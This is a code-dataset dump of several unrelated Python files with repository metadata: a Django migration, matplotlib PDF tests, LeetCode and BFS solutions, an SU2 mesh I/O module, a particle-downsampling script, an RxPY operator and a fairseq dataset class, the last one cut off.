# any() Return True if any key of the dictionary is true. If the dictionary is empty, return False.
# len() Return the length (the number of items) in the dictionary.
# cmp() Compares items of two dictionaries.
# sorted() Return a new sorted list of keys in the dictionary. | [
"eldadpuzach@gmail.com"
] | eldadpuzach@gmail.com |
f6450232aaf3f0568032b2d87c7fa644d8ab19c9 | 0c281ba9bb634d518536eea03059cdb05ba32cc5 | /many_to_one/migrations/0002_wpsuser.py | 1c896f777d6f0af5d69c690885ff05aa7fbc7677 | [] | no_license | parkhongbeen/Practice-Document | c09ef3a64d64c2067604b0c5f5d6fcabd96a8e50 | 441c1c1b21c6b66e1a01eea7487f6dffdfd98e58 | refs/heads/master | 2020-12-02T16:47:20.725694 | 2020-01-04T09:30:20 | 2020-01-04T09:30:20 | 231,061,336 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 674 | py | # Generated by Django 2.2.9 on 2020-01-02 05:42
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('many_to_one', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='WPSUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
('instructor', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='many_to_one.WPSUser')),
],
),
]
| [
"pack122@naver.com"
] | pack122@naver.com |
359e4313843a6aecb4d74aa0c3a945078ffed7bf | 893f83189700fefeba216e6899d42097cc0bec70 | /webpage/lib/python3.5/site-packages/matplotlib/tests/test_backend_pdf.py | 2feee6fb1238014212e65e61b693ae6c6637cac5 | [
"MIT"
] | permissive | pseudoPixels/SciWorCS | 79249198b3dd2a2653d4401d0f028f2180338371 | e1738c8b838c71b18598ceca29d7c487c76f876b | refs/heads/master | 2021-06-10T01:08:30.242094 | 2018-12-06T18:53:34 | 2018-12-06T18:53:34 | 140,774,351 | 0 | 1 | MIT | 2021-06-01T22:23:47 | 2018-07-12T23:33:53 | Python | UTF-8 | Python | false | false | 4,488 | py | # -*- encoding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import six
import io
import os
import numpy as np
from matplotlib import cm, rcParams
from matplotlib.backends.backend_pdf import PdfPages
from matplotlib import pyplot as plt
from matplotlib.testing.decorators import (image_comparison, knownfailureif,
cleanup)
if 'TRAVIS' not in os.environ:
@image_comparison(baseline_images=['pdf_use14corefonts'],
extensions=['pdf'])
def test_use14corefonts():
rcParams['pdf.use14corefonts'] = True
rcParams['font.family'] = 'sans-serif'
rcParams['font.size'] = 8
rcParams['font.sans-serif'] = ['Helvetica']
rcParams['pdf.compression'] = 0
text = '''A three-line text positioned just above a blue line
and containing some French characters and the euro symbol:
"Merci pépé pour les 10 €"'''
@cleanup
def test_type42():
rcParams['pdf.fonttype'] = 42
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot([1, 2, 3])
fig.savefig(io.BytesIO())
@cleanup
def test_multipage_pagecount():
with PdfPages(io.BytesIO()) as pdf:
assert pdf.get_pagecount() == 0
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot([1, 2, 3])
fig.savefig(pdf, format="pdf")
assert pdf.get_pagecount() == 1
pdf.savefig()
assert pdf.get_pagecount() == 2
@cleanup
def test_multipage_keep_empty():
from matplotlib.backends.backend_pdf import PdfPages
from tempfile import NamedTemporaryFile
# test empty pdf files
# test that an empty pdf is left behind with keep_empty=True (default)
with NamedTemporaryFile(delete=False) as tmp:
with PdfPages(tmp) as pdf:
filename = pdf._file.fh.name
assert os.path.exists(filename)
os.remove(filename)
# test if an empty pdf is deleting itself afterwards with keep_empty=False
with PdfPages(filename, keep_empty=False) as pdf:
pass
assert not os.path.exists(filename)
# test pdf files with content, they should never be deleted
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot([1, 2, 3])
# test that a non-empty pdf is left behind with keep_empty=True (default)
with NamedTemporaryFile(delete=False) as tmp:
with PdfPages(tmp) as pdf:
filename = pdf._file.fh.name
pdf.savefig()
assert os.path.exists(filename)
os.remove(filename)
# test that a non-empty pdf is left behind with keep_empty=False
with NamedTemporaryFile(delete=False) as tmp:
with PdfPages(tmp, keep_empty=False) as pdf:
filename = pdf._file.fh.name
pdf.savefig()
assert os.path.exists(filename)
os.remove(filename)
@cleanup
def test_composite_image():
#Test that figures can be saved with and without combining multiple images
#(on a single set of axes) into a single composite image.
X, Y = np.meshgrid(np.arange(-5, 5, 1), np.arange(-5, 5, 1))
Z = np.sin(Y ** 2)
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
ax.set_xlim(0, 3)
ax.imshow(Z, extent=[0, 1, 0, 1])
ax.imshow(Z[::-1], extent=[2, 3, 0, 1])
plt.rcParams['image.composite_image'] = True
with PdfPages(io.BytesIO()) as pdf:
fig.savefig(pdf, format="pdf")
assert len(pdf._file._images.keys()) == 1
plt.rcParams['image.composite_image'] = False
with PdfPages(io.BytesIO()) as pdf:
fig.savefig(pdf, format="pdf")
assert len(pdf._file._images.keys()) == 2
@image_comparison(baseline_images=['hatching_legend'],
extensions=['pdf'])
def test_hatching_legend():
"""Test for correct hatching on patches in legend"""
fig = plt.figure(figsize=(1, 2))
a = plt.Rectangle([0, 0], 0, 0, facecolor="green", hatch="XXXX")
b = plt.Rectangle([0, 0], 0, 0, facecolor="blue", hatch="XXXX")
fig.legend([a, b, a, b], ["", "", "", ""])
@image_comparison(baseline_images=['grayscale_alpha'],
extensions=['pdf'])
def test_grayscale_alpha():
"""Masking images with NaN did not work for grayscale images"""
x, y = np.ogrid[-2:2:.1, -2:2:.1]
dd = np.exp(-(x**2 + y**2))
dd[dd < .1] = np.nan
fig, ax = plt.subplots()
ax.imshow(dd, interpolation='none', cmap='gray_r')
ax.set_xticks([])
ax.set_yticks([])
| [
"golam.mostaeen@usask.ca"
] | golam.mostaeen@usask.ca |
54b4d3130aa1d007ebb68af85127de4f74fe2589 | 18b7f6e6a64ff4e33202f4c647d33240bf8ce015 | /Graph/Baek_1926.py | 3607ad4f55f10014997e3712a5551d0bbfe15fa5 | [] | no_license | qorjiwon/LevelUp-Algorithm | 80734b88e2543fb4b6da48377bb31b70d972b448 | 62a71552427290361e6ade9dcfe3ffc90a9d86e2 | refs/heads/master | 2023-06-16T16:33:44.427818 | 2021-03-12T14:39:25 | 2021-03-12T14:39:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,088 | py | """
@ Baek 1926. 그림
@ Prob. https://www.acmicpc.net/problem/1926
Ref.
@ Algo: 그래프(BFS)
@ Start day: 20. 03. 18.
@ End day: 20. 03. 18.
"""
from collections import deque
dx = [0, 0, -1, 1]
dy = [1, -1, 0, 0]
def BFS():
t = 1
q.append((i, j))
check[i][j] = 1
while q:
x, y = q.popleft()
for k in range(4):
nx, ny = x + dx[k], y + dy[k]
if 0 <= nx < N and 0 <= ny < M and MAP[nx][ny] == 1 and check[nx][ny] == 0:
check[nx][ny] = 1
q.append((nx, ny))
t += 1
return t
# N: 세로 M: 가로
N, M = map(int, input().split())
MAP = [list(map(int, input().split())) for _ in range(N)]
check = [[0] * M for _ in range(N)]
q = deque()
num_of_pic = 0
maxV = 0
for i in range(N):
for j in range(M):
if check[i][j] == 0 and MAP[i][j] == 1:
num_of_pic += 1
ret = BFS()
if ret > maxV: maxV = ret
print(num_of_pic)
print(maxV)
"""
6 5
1 1 0 1 1
0 1 1 0 0
0 0 0 0 0
1 0 1 1 1
0 0 1 1 1
0 0 1 1 1
>
4
9
""" | [
"21300035@handong.edu"
] | 21300035@handong.edu |
b3408d4959029e7cb7a05c3d3436095cd7e12f5e | 53983c1dbd4e27d918237d22287f1838ae42cc92 | /tools/SU2IO.py | 549c19ccdaa861824c8164b0755aec7d37de5e1e | [] | no_license | xshii/MDAOXS | da5060ea6b6ac600b3b85dddbb7460f62ab4a684 | d4c54b79d7c84740bf01d8e8573e54522de2e6d0 | refs/heads/master | 2021-09-24T10:35:31.295574 | 2018-10-08T10:54:44 | 2018-10-08T10:54:44 | 108,884,304 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 12,094 | py | #!/usr/bin/env python
## \file tools.py
# \brief mesh functions
# \author T. Lukaczyk, F. Palacios
# \version 6.0.0 "Falcon"
#
# The current SU2 release has been coordinated by the
# SU2 International Developers Society <www.su2devsociety.org>
# with selected contributions from the open-source community.
#
# The main research teams contributing to the current release are:
# - Prof. Juan J. Alonso's group at Stanford University.
# - Prof. Piero Colonna's group at Delft University of Technology.
# - Prof. Nicolas R. Gauger's group at Kaiserslautern University of Technology.
# - Prof. Alberto Guardone's group at Polytechnic University of Milan.
# - Prof. Rafael Palacios' group at Imperial College London.
# - Prof. Vincent Terrapon's group at the University of Liege.
# - Prof. Edwin van der Weide's group at the University of Twente.
# - Lab. of New Concepts in Aeronautics at Tech. Institute of Aeronautics.
#
# Copyright 2012-2018, Francisco D. Palacios, Thomas D. Economon,
# Tim Albring, and the SU2 contributors.
#
# SU2 is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# SU2 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with SU2. If not, see <http://www.gnu.org/licenses/>.
import sys
if sys.version_info[0] > 2:
    # In PY3, 'long' and 'int' are unified in 'int' type.
    # Module-level alias so the py2-era long(...) calls later in this file
    # keep working unchanged under Python 3.
    long = int
# -------------------------------------------------------------------
# Imports
# -------------------------------------------------------------------
import numpy as np
from itertools import islice
# ----------------------------------------------------------------------
# Read SU2 Mesh File
# ----------------------------------------------------------------------
def read(filename, scale=1.0):
    ''' imports mesh and builds python dictionary structure
        input: filename
               scale: scaling factor (optional)
                      NOTE(review): accepted for API compatibility but not
                      applied to the coordinates here -- confirm intent
        output:
           meshdata            mesh data dictionary
           meshdata['NDIME']   number of dimensions
           meshdata['NELEM']   number of elements
           meshdata['ELEM']    element array [ type, nodes, index ]
           meshdata['NPOIN']   number of points
           meshdata['NMARK']   number of markers
           meshdata['MARKS']   marker data dictionary
           meshdata['MARKS']['tag_name']          marker data for 'tag_name'
           meshdata['MARKS']['tag_name']['NELEM'] number of elements
           meshdata['MARKS']['tag_name']['ELEM']  element array [type,nodes]
    '''

    # initialize variables
    data = {}
    marks = {}

    # open meshfile; the context manager guarantees the handle is closed
    # even on a malformed file (the original leaked the handle on error)
    with open(filename, 'r') as meshfile:

        # readline helper function
        def mesh_readlines(n_lines=1):
            fileslice = islice(meshfile, n_lines)
            return list(fileslice)

        # scan file until end of file
        while True:
            # read line
            line = mesh_readlines()

            # stop if line is empty (end of file)
            if not line:
                break

            # fix white space
            line = line[0]
            line = line.replace('\t', ' ')
            line = line.replace('\n', ' ')

            # skip comments
            if line[0] == "%":
                pass

            # number of dimensions
            elif "NDIME=" in line:
                data['NDIME'] = int(line.split("=")[1].strip())
            #:if NDIME

            # elements
            elif "NELEM=" in line:
                # number of elements
                nelem = int(line.split("=")[1].strip())
                data['NELEM'] = nelem
                # only read nelem lines
                fileslice = islice(meshfile, nelem)
                # the data pattern: element type id followed by up to 9 node
                # indices; zip() truncates to however many tokens the line has
                pattern = tuple([int] * 10)
                data['ELEM'] = [
                    [t(s) for t, s in zip(pattern, elem_line.split())]
                    for elem_line in fileslice
                ]
            #: if NELEM

            # points
            elif "NPOIN=" in line:
                # number of points; keep only the first token (some files
                # append a second count on the NPOIN line)
                npoin = int(line.split("=")[1].strip().split(' ')[0])
                data['NPOIN'] = npoin
                # only read npoin lines
                fileslice = islice(meshfile, npoin)
                # the data pattern: up to three coordinates per line (any
                # trailing point-index column is dropped)
                pattern = tuple([float] * 3)
                data['POIN'] = [
                    [t(s) for t, s in zip(pattern, poin_line.split())]
                    for poin_line in fileslice
                ]
            #:if NPOIN

            # number of markers
            elif "NMARK=" in line:
                data['NMARK'] = int(line.split("=")[1].strip())
            #:if NMARK

            # a marker
            elif "MARKER_TAG=" in line:
                # marker tag
                thistag = line.split("=")[1].strip()
                # start SU2_MARK dictionary
                thismark = {'TAG': thistag}
                # the very next line must give the marker element count
                line = mesh_readlines()[0]
                if "MARKER_ELEMS=" not in line:
                    raise Exception("Marker Specification Error")
                thisnelem = int(line.split("=")[1].strip())
                thismark['NELEM'] = thisnelem
                # only read thisnelem lines
                fileslice = islice(meshfile, thisnelem)
                # same element pattern as the volume elements
                pattern = tuple([int] * 10)
                thismark['ELEM'] = [
                    [t(s) for t, s in zip(pattern, elem_line.split())]
                    for elem_line in fileslice
                ]
                # add to marker list
                marks[thismark['TAG']] = thismark
            #:if MARKER_TAG
        #:while not end of file

    # save to SU2_MESH data
    data['MARKS'] = marks

    return data

#: def read
# ----------------------------------------------------------------------
# Write SU2 Mesh File
# ----------------------------------------------------------------------
def write(filename, meshdata, scale=1.0):
    ''' writes meshdata to file
        inputs: filename, meshdata
                scale: multiplied into each coordinate on output (optional)
    '''

    # number of spatial dimensions drives how many coordinate columns we emit
    ndime = meshdata['NDIME']

    # open file for writing; context manager guarantees flush + close
    with open(filename, 'w') as outputfile:

        # write dimension
        outputfile.write("% \n% Problem Dimension \n% \n")
        outputfile.write("NDIME= %i\n" % meshdata['NDIME'])

        # write elements
        outputfile.write("% \n% Inner element connectivity \n% \n")
        outputfile.write("NELEM= %i\n" % meshdata['NELEM'])
        for elem in meshdata['ELEM']:
            for num in elem:
                outputfile.write("%i " % num)
            outputfile.write("\n")

        # write nodes
        outputfile.write("% \n% Node coordinates \n% \n")
        outputfile.write("NPOIN= %i\n" % meshdata['NPOIN'])
        for ipoint, poin in enumerate(meshdata['POIN']):
            for inum in range(ndime):
                outputfile.write("%#18.10e " % (poin[inum] * scale))
            # trailing index column: use the stored value when the point row
            # carries one, otherwise fall back to the running index.  The
            # original wrote poin[ndime] unconditionally, which raised
            # IndexError for 3-D meshes read() produces (3 floats per point).
            point_index = int(poin[ndime]) if len(poin) > ndime else ipoint
            outputfile.write("%i\n" % point_index)

        # write markers
        outputfile.write("% \n% Boundary elements \n% \n")
        outputfile.write("NMARK= %i\n" % meshdata['NMARK'])
        for mark_tag in meshdata['MARKS'].keys():
            this_mark = meshdata['MARKS'][mark_tag]
            outputfile.write("MARKER_TAG= %s\n" % this_mark['TAG'])
            outputfile.write("MARKER_ELEMS= %i\n" % this_mark['NELEM'])
            for elem in this_mark['ELEM']:
                for num in elem:
                    outputfile.write("%i " % num)
                outputfile.write("\n")

    return

#: def write
# ----------------------------------------------------------------------
# Get Marker Mesh Points
# ----------------------------------------------------------------------
def get_markerPoints(meshdata, mark_tags):
    ''' pulls all mesh nodes on the requested markers,
        de-duplicating nodes shared by adjacent edges
        returns (markerpoints, markernodes)
    '''

    # accept a single tag or a list of tags
    if not isinstance(mark_tags, list):
        mark_tags = [mark_tags]

    # some numbers
    n_marks = meshdata['NMARK']  # retained for parity with legacy behavior
    n_dim = meshdata['NDIME']

    # gather the node columns of every marker element (first column is the
    # element type, the rest are node indices)
    node_lists = []
    for tag in mark_tags:
        marker_elems = meshdata['MARKS'][tag]['ELEM']
        node_lists.extend(row[1:] for row in marker_elems)
    #: for each marker

    # flatten and keep each node once
    unique_nodes = list(np.unique(np.hstack(node_lists)))

    # look up the coordinates for every unique node
    unique_points = [meshdata['POIN'][node][0:n_dim] for node in unique_nodes]

    return unique_points, unique_nodes

#: def get_markerPoints()
# ----------------------------------------------------------------------
# Set Mesh Points
# ----------------------------------------------------------------------
def set_meshPoints(meshdata, meshnodes, meshpoints):
    ''' stores array of meshpoints in the meshdata structure
        note: mutates the input meshdata in place (same object returned);
              deep-copy beforehand if a fresh mesh is needed
    '''
    n_dim = meshdata['NDIME']

    # overwrite the first n_dim coordinates of each listed node
    for row, node in enumerate(meshnodes):
        for axis in range(n_dim):
            meshdata['POIN'][node][axis] = meshpoints[row][axis]

    return meshdata

# def: set_meshPoints
# ----------------------------------------------------------------------
# Sort Airfoil
# ----------------------------------------------------------------------
def sort_airfoil(mesh_data, marker_name):
    ''' sorts xy airfoil points in a clockwise loop starting from the
        trailing edge; returns (points_sorted, loop_sorted) index arrays
        assumes:
        - airfoil oriented nearly parallel with x-axis
        - oriented from leading to trailing edge in the +x-direction
        - one airfoil element with name 'marker_name'
    '''
    # find airfoil elements and points
    airfoil_elems = mesh_data['MARKS'][marker_name]['ELEM']
    airfoil_elems = np.array(airfoil_elems)
    airfoil_points = mesh_data['POIN']
    airfoil_points = np.array(airfoil_points)
    # keep only the points referenced by the first node of each edge
    airfoil_points = airfoil_points[airfoil_elems[:, 1], :]
    n_P, _ = airfoil_elems.shape
    # build transfer arrays
    EP = airfoil_elems[:, 1:3]  # edge to point
    PX = airfoil_points[:, 0:2]  # point to coord
    IP = np.arange(0, n_P)  # loop index to point
    # sorted airfoil point indeces tobe
    Psort = np.zeros(n_P, long)
    Isort = np.arange(0, n_P)
    # find trailing edge: the point with the largest x-coordinate
    iP0 = np.argmax(PX[:, 0])
    P0 = EP[iP0, 0]
    I0 = IP[iP0]
    Psort[0] = P0
    # build loop by repeatedly following the edge whose first node is P0
    for this_iP in range(1, n_P):
        # NOTE(review): P0 is reassigned BEFORE the mask used for I0 is
        # evaluated, so I0 is computed against the *new* P0 -- this looks
        # off-by-one relative to Psort; confirm against a known mesh.
        P0 = EP[EP[:, 0] == P0, 1]
        I0 = IP[EP[:, 0] == P0]
        Psort[this_iP] = P0
        Isort[this_iP] = I0
    # check for clockwise: compare y of the second and last sorted points
    D1 = PX[Isort[1], 1] - PX[Isort[0], 1]
    D2 = PX[Isort[-1], 1] - PX[Isort[0], 1]
    if D1 > D2:
        # NOTE(review): only Psort is reversed here; Isort keeps the original
        # direction -- verify whether the caller relies on both matching.
        Psort = Psort[-1::-1]
    # done
    points_sorted = Psort
    loop_sorted = Isort
    return points_sorted, loop_sorted
# def: sort_airfoil() | [
"xshi@kth.se"
] | xshi@kth.se |
916af822d50ca0fafb9a6c3f5bb98ced51dfb76c | f8e8e365c9cf58b61d72655bc2340baeaed5baff | /Leetcode/Python Solutions/Math/ReachingPoints.py | 0ac3289c31b1e8936a326fe489c9a2da788ad09e | [
"MIT"
] | permissive | Mostofa-Najmus-Sakib/Applied-Algorithm | 39a69f6b9ed113efe4a420d19cad79e0aa317637 | bc656fd655617407856e0ce45b68585fa81c5035 | refs/heads/master | 2023-08-31T19:54:34.242559 | 2021-11-05T03:43:35 | 2021-11-05T03:43:35 | 412,263,430 | 0 | 0 | MIT | 2021-09-30T23:45:29 | 2021-09-30T23:45:25 | null | UTF-8 | Python | false | false | 865 | py | """
LeetCode Problem: 780. Reaching Points
Link: https://leetcode.com/problems/reaching-points/
Language: Python
Written by: Mostofa Adib Shakib
Time Complexity: O(max(tx,ty))
Space Complexity: O(1)
"""
class Solution:
    """LeetCode 780: decide whether (tx, ty) is reachable from (sx, sy)
    using only the moves (x, y) -> (x + y, y) and (x, y) -> (x, x + y).

    Works backwards from the target: the larger target coordinate must have
    been produced by repeatedly adding the smaller one, so it can be reduced
    modulo the smaller coordinate.
    """

    def reachingPoints(self, sx: int, sy: int, tx: int, ty: int) -> bool:
        # The moves only ever grow coordinates, so overshooting is fatal.
        if tx < sx or ty < sy:
            return False
        # One coordinate already matches: the other must close the gap in
        # whole steps of the fixed coordinate.
        if tx == sx:
            return (ty - sy) % sx == 0
        if ty == sy:
            return (tx - sx) % sy == 0
        # Strip whole multiples of the smaller target coordinate.
        if tx > ty:
            return self.reachingPoints(sx, sy, tx % ty, ty)
        if ty > tx:
            return self.reachingPoints(sx, sy, tx, ty % tx)
        # tx == ty with neither coordinate matched: unreachable.
        return False
"adibshakib@gmail.com"
] | adibshakib@gmail.com |
8395fc7c7f92a208f8793b9f7b48c21bed9967d0 | 350db570521d3fc43f07df645addb9d6e648c17e | /0301_Remove_Invalid_Parentheses/solution_test.py | 2d7c1958b23dcdec8d5d9905ff2bd12cb4237244 | [] | no_license | benjaminhuanghuang/ben-leetcode | 2efcc9185459a1dd881c6e2ded96c42c5715560a | a2cd0dc5e098080df87c4fb57d16877d21ca47a3 | refs/heads/master | 2022-12-10T02:30:06.744566 | 2022-11-27T04:06:52 | 2022-11-27T04:06:52 | 236,252,145 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 384 | py |
'''
301. Remove Invalid Parentheses
Level: Hard
https://leetcode.com/problems/remove-invalid-parentheses
'''
import unittest
class TestSum(unittest.TestCase):
    """Placeholder unittest suite for problem 301 (no solution exercised)."""

    def test_sum(self):
        self.assertEqual(sum([1, 2, 3]), 6, "Should be 6")

    def test_sum_tuple(self):
        # NOTE(review): sum((1, 2, 2)) is 5, so this assertion fails when
        # run -- it matches Real Python's deliberately-failing tutorial
        # example; confirm whether the failure is intentional here.
        self.assertEqual(sum((1, 2, 2)), 6, "Should be 6")
if __name__ == '__main__':
unittest.main() | [
"bhuang@rms.com"
] | bhuang@rms.com |
0f3b58683b7e2728255fccc69cf4195878792e65 | 28de04457e8ebcd1b34494db07bde8a3f25d8cf1 | /easy/symmetric_tree_101.py | 4480cfb339a9ab97cd6ab801aba0f4c8d142ae4b | [] | no_license | YangXinNewlife/LeetCode | 1df4218eef6b81db81bf2f0548d0a18bc9a5d672 | 20d3d0aa325d79c716acfc75daef32f8d4f9f1ad | refs/heads/master | 2023-08-16T23:18:29.776539 | 2023-08-15T15:53:30 | 2023-08-15T15:53:30 | 70,552,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,750 | py | # -*- coding:utf-8 -*-
__author__ = 'yangxin_ryan'
"""
Given a binary tree, check whether it is a mirror of itself (ie, symmetric around its center).
For example, this binary tree [1,2,2,3,4,4,3] is symmetric:
1
/ \
2 2
/ \ / \
3 4 4 3
But the following [1,2,2,null,3,null,3] is not:
1
/ \
2 2
\ \
3 3
Note:
Bonus points if you could solve it both recursively and iteratively.
Solution:
怎么判断一颗二叉树是Symmetric对称树
1.当root根节点为None的时候,为对称树。
2.当root根节点为非空,其左右孩子为None的时候,为对称树。
3.当root根节点为非空,其左或右孩子为None当时候,为非对称树。
4.当root根节点为非空,其左右孩子非空,但是左右孩子的val不相等的时候,为非对称树。
5.当root根节点为非空,其左右孩子非空,其左右孩子的val相等,那么再次调用函数去对比该左右孩子的左右孩子是否对称。
"""
class SymmetricTree(object):
    """LeetCode 101: check whether a binary tree is a mirror of itself
    around its center.

    Nodes are expected to expose ``val``, ``left`` and ``right`` attributes
    (the usual LeetCode ``TreeNode`` shape).  A tree is symmetric when:
      1. the root is None, or
      2. its left and right subtrees are mirror images of each other
         (equal values, with left/right children swapped at every level).
    """

    def isSymmetric(self, root: "TreeNode") -> bool:
        """Return True if the tree rooted at *root* is symmetric.

        The annotation is a quoted forward reference because ``TreeNode``
        is not defined in this module; the original unquoted annotation
        raised NameError at import time.
        """
        if root is None:
            return True
        return self.judge(root.left, root.right)

    def judge(self, left, right):
        """Return True if subtrees *left* and *right* mirror each other."""
        # Both empty: trivially mirrored.
        if left is None and right is None:
            return True
        # Exactly one empty: shapes differ.
        if left is None or right is None:
            return False
        # Values must match at mirrored positions.
        if left.val != right.val:
            return False
        # Recurse with the children cross-paired.
        return self.judge(left.left, right.right) and self.judge(left.right, right.left)
| [
"yangxin03@youxin.com"
] | yangxin03@youxin.com |
fd63cd6e400939b33de938e5de18673f74a5eae9 | f3e1423c27467e2501a5443a8767a40141752acc | /rx/core/operators/concat.py | 6c9eb5d63777ff846850ba55cd0d0a5d577af32e | [
"MIT"
] | permissive | py-lab/RxPY | a08a16cbb381aed08485e0e2c36098884f3ba903 | ce12560f9481dbd0d072911e12ff2ed30be328bf | refs/heads/master | 2020-08-09T10:25:38.111773 | 2019-10-05T20:44:32 | 2019-10-05T20:44:32 | 214,068,251 | 0 | 1 | MIT | 2019-10-10T02:28:10 | 2019-10-10T02:28:09 | null | UTF-8 | Python | false | false | 605 | py | from typing import Callable
import rx
from rx.core import Observable
def _concat(*sources: Observable) -> Callable[[Observable], Observable]:
    def concat(source: Observable) -> Observable:
        """Concatenate the piped sequence with every additional source.

        Examples:
            >>> op = concat(xs, ys, zs)

        Returns:
            An observable sequence that contains the elements of each
            given sequence in sequential order, starting with *source*.
        """
        all_sources = (source,) + sources
        return rx.concat(*all_sources)
    return concat
| [
"dag@brattli.net"
] | dag@brattli.net |
af832263b949a29bb698b61d332031527b2055fb | 94560fcfd85bf81c326063ff035c593b2793863c | /asap/scripts/um_downsample_particles.py | 5e3e8b0b886b003c2d525ce23333a04b8689f99c | [
"Unlicense"
] | permissive | dr-guangtou/asap | 783a0607aea631c7d56ea9142e9e4f8505c3eac4 | 4b796b9708ee1a1d854d4ddf6d5c6e811941f55e | refs/heads/master | 2021-03-27T19:38:44.986573 | 2020-04-02T21:25:28 | 2020-04-02T21:25:28 | 111,163,115 | 2 | 0 | Unlicense | 2019-11-06T22:02:05 | 2017-11-18T00:20:30 | Jupyter Notebook | UTF-8 | Python | false | false | 2,339 | py | #!/usr/bin/env python
"""This script will read the dark matter particle table for the SMDPL
simulation, and downsample it for our model.
"""
import os
import argparse
import numpy as np
import pandas as pd
def downsample_particles(ptbl_file, n_million, seed=95064, csv=False, verbose=True):
    """Down-sample a dark-matter particle table to n_million * 1e6 rows.

    Reads the x/y/z columns of the table, draws a random subset without
    replacement (reproducible via *seed*), and saves it next to the input
    as ``<name>_downsample_<N>m.npy``.
    """
    if not os.path.isfile(ptbl_file):
        raise IOError("# Can not find the particle table : %s" % ptbl_file)
    ptbl_pre, ptbl_ext = os.path.splitext(ptbl_file)
    # Reduce the number of colunms and save as a numpy array
    ptbl_out = ptbl_pre + "_downsample_%.1fm.npy" % n_million
    if verbose:
        print("# Save the downsampled catalog to : %s" % ptbl_out)
    # Data format for output (structured array: one float64 per axis)
    particle_table_dtype = [
        ("x", "float64"), ("y", "float64"), ("z", "float64")]
    if csv or ptbl_ext == '.csv':
        use_csv = True
    else:
        use_csv = False
    # Read the data in 1M-row chunks to bound memory
    # NOTE(review): delim_whitespace=use_csv looks inverted -- it makes
    # .csv files whitespace-delimited and everything else comma-delimited;
    # confirm against the actual SMDPL file format.
    # NOTE(review): pandas' dtype= normally expects a dict/scalar, not a
    # list of tuples -- verify this call works on the pandas version in use.
    chunksize = 1000000
    ptbl_pchunks = pd.read_csv(
        ptbl_file, usecols=[0, 1, 2], delim_whitespace=use_csv,
        names=['x', 'y', 'z', 'vx', 'vy', 'vz', 'id'],
        dtype=particle_table_dtype, index_col=False,
        chunksize=chunksize)
    ptbl_pdframe = pd.concat(ptbl_pchunks)
    # Reinterpret the flat float buffer as a structured (x, y, z) array
    ptbl_array = ptbl_pdframe.values.ravel().view(dtype=particle_table_dtype)
    # Downsample without replacement, reproducibly
    np.random.seed(seed)
    ptbl_downsample = np.random.choice(ptbl_array, int(n_million * 1e6), replace=False)
    # Save the result
    np.save(ptbl_out, ptbl_downsample)
if __name__ == "__main__":
    # Command-line front end: particle file + target size in millions,
    # with optional seed / verbosity / csv-format flags.
    parser = argparse.ArgumentParser()
    parser.add_argument(
        'ptbl_file', type=str,
        help=('The particle catalog.'))
    parser.add_argument(
        'n_million', type=float,
        help=('Downsample the catalog to N x millions particles.'))
    parser.add_argument(
        '-s', '--seed', dest='seed',
        help='Random seed',
        type=int, default=95064)
    parser.add_argument(
        '-v', '--verbose', dest='verbose',
        action="store_true", default=False)
    parser.add_argument(
        '-c', '--csv', dest='csv',
        action="store_true", default=False)

    args = parser.parse_args()

    downsample_particles(args.ptbl_file, args.n_million,
                         csv=args.csv, seed=args.seed, verbose=args.verbose)
| [
"dr.guangtou@gmail.com"
] | dr.guangtou@gmail.com |
d4811b8ca1441d7078425d3f83304197fba009e7 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02393/s162472512.py | 2cf404e7460cb93fb79ee9ba11c0d04e33e900f5 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | list=sorted([int(x) for x in input().split()])
print(str(list[0])+" "+str(list[1])+" "+str(list[2])) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
81a3b8cf4112ab531cb3cfba9a91eded7429840b | fb1e852da0a026fb59c8cb24aeb40e62005501f1 | /kosmos-2/fairseq/fairseq/data/id_dataset.py | 3e4d7969cf2a26e852b466f165a6fadabae3b35f | [
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-free-unknown",
"Apache-2.0"
] | permissive | microsoft/unilm | 134aa44867c5ed36222220d3f4fd9616d02db573 | b60c741f746877293bb85eed6806736fc8fa0ffd | refs/heads/master | 2023-08-31T04:09:05.779071 | 2023-08-29T14:07:57 | 2023-08-29T14:07:57 | 198,350,484 | 15,313 | 2,192 | MIT | 2023-08-19T11:33:20 | 2019-07-23T04:15:28 | Python | UTF-8 | Python | false | false | 423 | py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import torch
from . import FairseqDataset
class IdDataset(FairseqDataset):
    """Dataset whose "example" is simply the example index itself.

    Used to carry sample ids alongside the real data through batching.
    """

    def __getitem__(self, index):
        # Each item is its own index.
        return index

    def __len__(self):
        # NOTE(review): reports length 0 -- presumably sizing comes from
